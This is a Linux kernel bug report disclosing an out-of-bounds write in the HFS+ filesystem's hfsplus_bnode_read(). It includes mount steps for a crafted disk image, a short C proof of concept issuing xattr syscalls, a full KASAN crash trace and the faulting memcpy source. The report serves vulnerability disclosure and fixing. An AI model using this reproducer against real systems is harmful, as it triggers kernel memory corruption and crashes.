Bug 200293 - Out-of-bound access in hfsplus_bnode_read()
Summary: Out-of-bound access in hfsplus_bnode_read()
Status: NEW
Alias: None
Product: File System
Classification: Unclassified
Component: HFS/HFSPLUS (show other bugs)
Hardware: All Linux
: P1 normal
Assignee: fs_hfs@kernel-bugs.osdl.org
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2018-06-27 03:53 UTC by Wen Xu
Modified: 2018-06-27 03:53 UTC (History)
1 user (show)

See Also:
Kernel Version: 4.18
Subsystem:
Regression: No
Bisected commit-id:


Attachments
The (compressed) crafted image which causes crash (4.00 MB, application/octet-stream)
2018-06-27 03:53 UTC, Wen Xu

Description Wen Xu 2018-06-27 03:53:05 UTC
Created attachment 276895 [details]
The (compressed) crafted image which causes crash

- Reproduce (4.18)
# mkdir mnt
# mount -t hfsplus 8.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>

#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <linux/falloc.h>
#include <linux/loop.h>

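/*
 * Reproducer step from the report: issue the xattr syscall sequence
 * against <mpoint>/foo/bar/xattr on the mounted crafted image.
 *
 * mpoint: mount point of the crafted hfsplus image; must be non-NULL.
 *
 * The syscall results are reported via perror() but do not abort the
 * sequence, because the condition under test is a kernel crash rather
 * than a userspace error; a run that does not crash can still be
 * diagnosed from the errno output.
 */
static void activity(char *mpoint) {
  char *xattr = NULL;

  /* asprintf() leaves xattr undefined on failure, so it must be checked
   * before the pointer is handed to any syscall. */
  if (asprintf(&xattr, "%s/foo/bar/xattr", mpoint) < 0) {
    perror("asprintf");
    return;
  }

  /* Zeroed payload buffer, same size as in the original report. */
  char buf2[113];
  memset(buf2, 0, sizeof(buf2));

  if (listxattr(xattr, buf2, sizeof(buf2)) < 0)
    perror("listxattr");
  if (removexattr(xattr, "user.mime_type") < 0)
    perror("removexattr");
  if (setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_CREATE) < 0)
    perror("setxattr(XATTR_CREATE)");
  if (setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_REPLACE) < 0)
    perror("setxattr(XATTR_REPLACE)");

  /* asprintf() allocated the path; the original leaked it. */
  free(xattr);
}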

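/*
 * Entry point: argv[1] is the mount point of the crafted image.
 *
 * Returns EXIT_FAILURE with a usage message when the argument is
 * missing, instead of passing a NULL argv[1] to activity().
 */
int main(int argc, char *argv[]) {
  if (argc < 2) {
    fprintf(stderr, "usage: %s <mountpoint>\n", argv[0]);
    return EXIT_FAILURE;
  }
  activity(argv[1]);
  return 0;
}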

- Kernel message
[  925.089898] hfsplus: request for non-existent node 5888 in B*Tree
[  925.091299] hfsplus: request for non-existent node 5888 in B*Tree
[  925.092783] ==================================================================
[  925.094367] BUG: KASAN: slab-out-of-bounds in hfsplus_bnode_read+0xb1/0x140
[  925.095783] Write of size 3922 at addr ffff8801eff06400 by task a.out/1421

[  925.097521] CPU: 0 PID: 1421 Comm: a.out Not tainted 4.18.0-rc1+ #6
[  925.097529] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  925.097535] Call Trace:
[  925.097573]  dump_stack+0x7b/0xb5
[  925.097610]  print_address_description+0x70/0x290
[  925.097616]  kasan_report+0x291/0x390
[  925.097620]  ? hfsplus_bnode_read+0xb1/0x140
[  925.097637]  check_memory_region+0x139/0x190
[  925.097641]  memcpy+0x37/0x50
[  925.097646]  hfsplus_bnode_read+0xb1/0x140
[  925.097652]  hfsplus_bnode_read_key+0xfb/0x140
[  925.097657]  ? hfsplus_bnode_read_u8+0xa0/0xa0
[  925.097679]  ? set_page_dirty+0x9c/0x120
[  925.097685]  ? hfsplus_bnode_write+0xc2/0x170
[  925.097690]  hfsplus_brec_insert+0x3e2/0x6c0
[  925.097696]  ? hfsplus_brec_keylen+0x130/0x130
[  925.097701]  ? __kmalloc+0x11f/0x240
[  925.097707]  hfsplus_create_attr+0x263/0x2b0
[  925.097712]  ? hfsplus_attr_exists+0x140/0x140
[  925.097720]  ? strncmp+0x3d/0xc0
[  925.097725]  __hfsplus_setxattr+0x2d5/0x1160
[  925.097757]  ? unwind_get_return_address+0x36/0x50
[  925.097763]  ? kasan_check_write+0x14/0x20
[  925.097790]  ? _raw_spin_lock_irqsave+0x2a/0x60
[  925.097797]  ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280
[  925.097802]  ? save_stack+0x46/0xd0
[  925.097805]  ? kasan_kmalloc+0xad/0xe0
[  925.097809]  ? kmem_cache_alloc_trace+0x102/0x200
[  925.097814]  ? hfsplus_setxattr+0x4c/0xb0
[  925.097818]  ? hfsplus_user_setxattr+0x27/0x30
[  925.097831]  ? __vfs_setxattr+0x7c/0xa0
[  925.097835]  ? __vfs_setxattr_noperm+0x8d/0x200
[  925.097839]  ? vfs_setxattr+0xb3/0xc0
[  925.097846]  ? setxattr+0x1b3/0x260
[  925.097851]  ? path_setxattr+0x134/0x170
[  925.097855]  ? __x64_sys_setxattr+0x6d/0x80
[  925.097869]  ? do_syscall_64+0x78/0x170
[  925.097874]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  925.097879]  ? save_stack+0xb5/0xd0
[  925.097883]  ? save_stack+0x46/0xd0
[  925.097886]  ? kasan_kmalloc+0xad/0xe0
[  925.097890]  ? __kmalloc_node+0x11e/0x2e0
[  925.097903]  ? kvmalloc_node+0x31/0x80
[  925.097907]  ? setxattr+0x114/0x260
[  925.097911]  ? path_setxattr+0x134/0x170
[  925.097914]  ? __x64_sys_setxattr+0x6d/0x80
[  925.097918]  ? do_syscall_64+0x78/0x170
[  925.097923]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  925.097926]  ? save_stack+0xb5/0xd0
[  925.097930]  ? save_stack+0x46/0xd0
[  925.097933]  ? __kasan_slab_free+0x13c/0x1a0
[  925.097936]  ? kasan_slab_free+0xe/0x10
[  925.097940]  ? kmem_cache_free+0x89/0x1e0
[  925.097949]  ? putname+0x80/0x90
[  925.097953]  ? filename_lookup+0x191/0x280
[  925.097957]  ? kasan_unpoison_shadow+0x36/0x50
[  925.097961]  ? kasan_kmalloc+0xad/0xe0
[  925.097966]  ? kmem_cache_alloc_trace+0x102/0x200
[  925.097972]  hfsplus_setxattr+0x8a/0xb0
[  925.097976]  hfsplus_user_setxattr+0x27/0x30
[  925.097980]  __vfs_setxattr+0x7c/0xa0
[  925.097985]  __vfs_setxattr_noperm+0x8d/0x200
[  925.097989]  vfs_setxattr+0xb3/0xc0
[  925.097994]  setxattr+0x1b3/0x260
[  925.097998]  ? vfs_setxattr+0xc0/0xc0
[  925.098001]  ? filename_lookup+0x191/0x280
[  925.098005]  ? filename_parentat+0x2b0/0x2b0
[  925.098010]  ? kasan_kmalloc+0xad/0xe0
[  925.098015]  ? kasan_check_write+0x14/0x20
[  925.098039]  ? strncpy_from_user+0xa8/0x1c0
[  925.098052]  ? __mnt_is_readonly.part.13+0x23/0x30
[  925.098057]  ? __mnt_want_write+0x9d/0xb0
[  925.098062]  path_setxattr+0x134/0x170
[  925.098066]  ? setxattr+0x260/0x260
[  925.098076]  ? vm_brk+0x20/0x20
[  925.098081]  __x64_sys_setxattr+0x6d/0x80
[  925.098086]  do_syscall_64+0x78/0x170
[  925.098091]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  925.098114] RIP: 0033:0x7f5b520391fa
[  925.098115] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48
[  925.098177] RSP: 002b:00007ffcadce8fb8 EFLAGS: 00000206 ORIG_RAX: 00000000000000bc
[  925.098186] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5b520391fa
[  925.098189] RDX: 00007ffcadce8fe0 RSI: 00000000004008a4 RDI: 0000000001e1b080
[  925.098191] RBP: 00007ffcadce9060 R08: 0000000000000001 R09: 0000000000000000
[  925.098194] R10: 0000000000000071 R11: 0000000000000206 R12: 00000000004005e0
[  925.098196] R13: 00007ffcadce9160 R14: 0000000000000000 R15: 0000000000000000

[  925.098546] Allocated by task 1421:
[  925.099280]  save_stack+0x46/0xd0
[  925.099284]  kasan_kmalloc+0xad/0xe0
[  925.099288]  __kmalloc+0x11f/0x240
[  925.099292]  hfsplus_find_init+0x54/0xc0
[  925.099296]  hfsplus_create_attr+0x10c/0x2b0
[  925.099300]  __hfsplus_setxattr+0x2d5/0x1160
[  925.099304]  hfsplus_setxattr+0x8a/0xb0
[  925.099308]  hfsplus_user_setxattr+0x27/0x30
[  925.099311]  __vfs_setxattr+0x7c/0xa0
[  925.099314]  __vfs_setxattr_noperm+0x8d/0x200
[  925.099318]  vfs_setxattr+0xb3/0xc0
[  925.099321]  setxattr+0x1b3/0x260
[  925.099324]  path_setxattr+0x134/0x170
[  925.099327]  __x64_sys_setxattr+0x6d/0x80
[  925.099331]  do_syscall_64+0x78/0x170
[  925.099336]  entry_SYSCALL_64_after_hwframe+0x44/0xa9

[  925.099671] Freed by task 0:
[  925.100274] (stack is not available)

[  925.101346] The buggy address belongs to the object at ffff8801eff06400
                which belongs to the cache kmalloc-1024 of size 1024
[  925.103925] The buggy address is located 0 bytes inside of
                1024-byte region [ffff8801eff06400, ffff8801eff06800)
[  925.106280] The buggy address belongs to the page:
[  925.107281] page:ffffea0007bfc100 count:1 mapcount:0 mapping:ffff8801f6802c40 index:0x0 compound_mapcount: 0
[  925.109289] flags: 0x2ffff0000008100(slab|head)
[  925.110247] raw: 02ffff0000008100 dead000000000100 dead000000000200 ffff8801f6802c40
[  925.111811] raw: 0000000000000000 00000000800e000e 00000001ffffffff 0000000000000000
[  925.113374] page dumped because: kasan: bad access detected

[  925.114846] Memory state around the buggy address:
[  925.115822]  ffff8801eff06500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  925.117269]  ffff8801eff06580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  925.118738] >ffff8801eff06600: 00 00 00 fc fc fc fc fc fc fc fc fc fc fc fc fc
[  925.120199]                             ^
[  925.121025]  ffff8801eff06680: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[  925.122497]  ffff8801eff06700: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[  925.123955] ==================================================================
[  925.125422] Disabling lock debugging due to kernel taint
[  925.125610] general protection fault: 0000 [#1] SMP KASAN PTI
[  925.126835] CPU: 0 PID: 1421 Comm: a.out Tainted: G    B             4.18.0-rc1+ #6
[  925.128393] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  925.130438] RIP: 0010:__memcpy+0x12/0x20
[  925.131255] Code: 5b 41 5c 41 5d 5d c3 48 89 df e8 59 f6 ff ff eb c9 90 90 90 90 90 90 90 66 66 90 66 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 <f3> 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8 48 89 d1 f3 a4
[  925.135067] RSP: 0018:ffff8801dfbff490 EFLAGS: 00010246
[  925.136131] RAX: ffff8801eff08352 RBX: 0000000000001000 RCX: 0000000000000200
[  925.137577] RDX: 0000000000000000 RSI: 580556c000016000 RDI: ffff8801eff08352
[  925.139034] RBP: ffff8801dfbff4b0 R08: 0000000000000006 R09: ffffed003dfe106a
[  925.140478] R10: 0000000000000006 R11: ffffed003dfe126a R12: ffff8801eff08352
[  925.141925] R13: 580556c000016000 R14: ffff8801eff08352 R15: 000000000000d7b0
[  925.143365] FS:  00007f5b52518700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  925.144989] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  925.146163] CR2: 0000000001e1b008 CR3: 00000001deb04000 CR4: 00000000000006f0
[  925.147611] Call Trace:
[  925.148133]  ? memcpy+0x45/0x50
[  925.148788]  hfsplus_bnode_read+0x129/0x140
[  925.149650]  hfsplus_bnode_read_key+0xfb/0x140
[  925.157205]  ? hfsplus_bnode_read_u8+0xa0/0xa0
[  925.158142]  ? set_page_dirty+0x9c/0x120
[  925.158961]  ? hfsplus_bnode_write+0xc2/0x170
[  925.159868]  hfsplus_brec_insert+0x3e2/0x6c0
[  925.160755]  ? hfsplus_brec_keylen+0x130/0x130
[  925.161676]  ? __kmalloc+0x11f/0x240
[  925.162433]  hfsplus_create_attr+0x263/0x2b0
[  925.163319]  ? hfsplus_attr_exists+0x140/0x140
[  925.164238]  ? strncmp+0x3d/0xc0
[  925.164914]  __hfsplus_setxattr+0x2d5/0x1160
[  925.165806]  ? unwind_get_return_address+0x36/0x50
[  925.166795]  ? kasan_check_write+0x14/0x20
[  925.167645]  ? _raw_spin_lock_irqsave+0x2a/0x60
[  925.168579]  ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280
[  925.169784]  ? save_stack+0x46/0xd0
[  925.170515]  ? kasan_kmalloc+0xad/0xe0
[  925.171299]  ? kmem_cache_alloc_trace+0x102/0x200
[  925.172273]  ? hfsplus_setxattr+0x4c/0xb0
[  925.173107]  ? hfsplus_user_setxattr+0x27/0x30
[  925.174035]  ? __vfs_setxattr+0x7c/0xa0
[  925.174831]  ? __vfs_setxattr_noperm+0x8d/0x200
[  925.175766]  ? vfs_setxattr+0xb3/0xc0
[  925.176529]  ? setxattr+0x1b3/0x260
[  925.177256]  ? path_setxattr+0x134/0x170
[  925.178081]  ? __x64_sys_setxattr+0x6d/0x80
[  925.178950]  ? do_syscall_64+0x78/0x170
[  925.179751]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  925.180824]  ? save_stack+0xb5/0xd0
[  925.181552]  ? save_stack+0x46/0xd0
[  925.182292]  ? kasan_kmalloc+0xad/0xe0
[  925.183074]  ? __kmalloc_node+0x11e/0x2e0
[  925.183906]  ? kvmalloc_node+0x31/0x80
[  925.184688]  ? setxattr+0x114/0x260
[  925.185418]  ? path_setxattr+0x134/0x170
[  925.186244]  ? __x64_sys_setxattr+0x6d/0x80
[  925.187120]  ? do_syscall_64+0x78/0x170
[  925.187922]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  925.188996]  ? save_stack+0xb5/0xd0
[  925.189728]  ? save_stack+0x46/0xd0
[  925.190471]  ? __kasan_slab_free+0x13c/0x1a0
[  925.191349]  ? kasan_slab_free+0xe/0x10
[  925.192147]  ? kmem_cache_free+0x89/0x1e0
[  925.192978]  ? putname+0x80/0x90
[  925.193654]  ? filename_lookup+0x191/0x280
[  925.194515]  ? kasan_unpoison_shadow+0x36/0x50
[  925.195436]  ? kasan_kmalloc+0xad/0xe0
[  925.196221]  ? kmem_cache_alloc_trace+0x102/0x200
[  925.197194]  hfsplus_setxattr+0x8a/0xb0
[  925.198005]  hfsplus_user_setxattr+0x27/0x30
[  925.198892]  __vfs_setxattr+0x7c/0xa0
[  925.199659]  __vfs_setxattr_noperm+0x8d/0x200
[  925.200560]  vfs_setxattr+0xb3/0xc0
[  925.201294]  setxattr+0x1b3/0x260
[  925.202003]  ? vfs_setxattr+0xc0/0xc0
[  925.202769]  ? filename_lookup+0x191/0x280
[  925.203621]  ? filename_parentat+0x2b0/0x2b0
[  925.204509]  ? kasan_kmalloc+0xad/0xe0
[  925.205295]  ? kasan_check_write+0x14/0x20
[  925.206161]  ? strncpy_from_user+0xa8/0x1c0
[  925.207033]  ? __mnt_is_readonly.part.13+0x23/0x30
[  925.208023]  ? __mnt_want_write+0x9d/0xb0
[  925.208856]  path_setxattr+0x134/0x170
[  925.209636]  ? setxattr+0x260/0x260
[  925.210376]  ? vm_brk+0x20/0x20
[  925.211038]  __x64_sys_setxattr+0x6d/0x80
[  925.211877]  do_syscall_64+0x78/0x170
[  925.212644]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  925.213683] RIP: 0033:0x7f5b520391fa
[  925.214436] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48
[  925.218313] RSP: 002b:00007ffcadce8fb8 EFLAGS: 00000206 ORIG_RAX: 00000000000000bc
[  925.219855] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5b520391fa
[  925.221306] RDX: 00007ffcadce8fe0 RSI: 00000000004008a4 RDI: 0000000001e1b080
[  925.222769] RBP: 00007ffcadce9060 R08: 0000000000000001 R09: 0000000000000000
[  925.224223] R10: 0000000000000071 R11: 0000000000000206 R12: 00000000004005e0
[  925.225672] R13: 00007ffcadce9160 R14: 0000000000000000 R15: 0000000000000000
[  925.227149] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops crct10dif_pclmul ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy
[  925.237067] ---[ end trace 7f5a46c7478f1295 ]---
[  925.238062] RIP: 0010:__memcpy+0x12/0x20
[  925.238907] Code: 5b 41 5c 41 5d 5d c3 48 89 df e8 59 f6 ff ff eb c9 90 90 90 90 90 90 90 66 66 90 66 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 <f3> 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8 48 89 d1 f3 a4
[  925.242813] RSP: 0018:ffff8801dfbff490 EFLAGS: 00010246
[  925.243896] RAX: ffff8801eff08352 RBX: 0000000000001000 RCX: 0000000000000200
[  925.245328] RDX: 0000000000000000 RSI: 580556c000016000 RDI: ffff8801eff08352
[  925.246855] RBP: ffff8801dfbff4b0 R08: 0000000000000006 R09: ffffed003dfe106a
[  925.248305] R10: 0000000000000006 R11: ffffed003dfe126a R12: ffff8801eff08352
[  925.249743] R13: 580556c000016000 R14: ffff8801eff08352 R15: 000000000000d7b0
[  925.251254] FS:  00007f5b52518700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  925.252904] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  925.254085] CR2: 0000000001e1b008 CR3: 00000001deb04000 CR4: 00000000000006f0

- Location
https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/hfsplus/bnode.c#L38
	while ((len -= l) != 0) {
		buf += l;
		l = min_t(int, len, PAGE_SIZE);
		memcpy(buf, kmap(*++pagep), l);
		kunmap(*pagep);
	}
The out-of-bounds access happens in this memcpy(), as the KASAN report above shows.

Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.
